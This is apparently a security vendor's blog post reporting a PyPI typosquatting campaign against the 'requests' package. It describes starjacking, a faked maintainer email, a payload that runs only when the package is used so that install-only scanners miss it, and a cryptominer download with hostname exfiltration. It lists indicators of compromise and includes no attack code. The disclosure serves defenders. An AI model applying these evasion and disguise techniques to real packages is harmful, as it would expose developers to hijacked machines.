Typosquatting Attack on ‘requests’- One of the Most Popular Python packages
Python’s requests package is the unofficial champion when it comes to performing HTTP requests. While there are many 3rd party packages trying to help with making HTTP requests easier, the requests package is by far one of the best user experience packages out there with nearly 50,000,000 weekly installations.
Attack
On May 31, 09:29:11, Checkmarx’s automated package analysis technology reported a suspicious activity with multiple red flags. Tal Folkman, a senior security researcher in Checkmarx’s Supply Chain Security (SCS) research team, verified the malicious activity and revealed a multi-technique campaign, which was quickly reported to PyPi’s security team less than one hour after the attack was launched.
Techniques
As defenders, we see many attackers. One thing we can say for sure is those attackers evolving and keep improving their techniques.
Typosquatting
This technique relies on human typing mistakes and it is very clear in this case the attacker used it since the multiple similar permutations for the ‘requests’ package.
StarJacking
For those of you who haven’t heard about Starjacking, check out this blogpost .
In this attack, the original ‘requests’ GitHub repository was named as the repository of the malicious packages, making them look highly popular and reliable.
Execution Upon Usage
The malicious payload is tricky and launches upon usage, meaning you must import the malicious package and use it in order to invoke the malicious code. IMHO this was done to avoid some security scanners as they blindly install the package to see what happens without actually using it.
Disposable Account
The PyPi account OrangeAlice is clearly fake. It was created on May 27th and contains a total of 11 packages. 1 test package and 10 typosquatting attempts.
The attacker who published those packages stated in their metadata that his email is “me@kennethreitz.org”, an unvetted lie as this email actually belongs to the original maintainer of the original requests package, Kenneth Reitz.
The Impact
Crypto Miner
The malicious code executed downloads an open source cryptominer software called “xmrig” version 6.17.0 from the official project’s release page on GitHub https://github.com/xmrig/xmrig
Once the software is downloaded and extracted, it is executed as a subprocess, provided with the attacker’s wallet address to collect the funds
By checking the attacker’s wallet on https://supportxmr.com/ we’ve seen he has gained some traffic.
Hostname Exfiltration
In addition, the attacker send the victim’s hostname to his application hosted on serene-springs-50769[.]herokuapp[.]com
Conclusion
‘requests’ is one of the most popular Python packages and a typosquatting attack on it can cause significant damage, this time in the form of a cryptominer.
We have reported all packages to PyPI and working with them to block the attack as soon as possible. please exercise caution until the malicious packages are removed.
Package Names
IOCs
- serene-springs-50769[.]herokuapp[.]com
- 44ZptWtXxVhjLYGz8oKCMSW6nA9Gpc2RVYQDzyBnaM7VZkaCTGZGEANQTR3pNXK3mzZq1cVzKs1SA3H4Wibc6qVvG5xpcSY
Checkmarx Got Your Back!
Customers of Checkmarx are safe as our ahead of time cloud analysis technologies, seamlessly integrated with Checkmarx SCA solution, alerts from such accidental installation of malicious packages before it is shipped forward
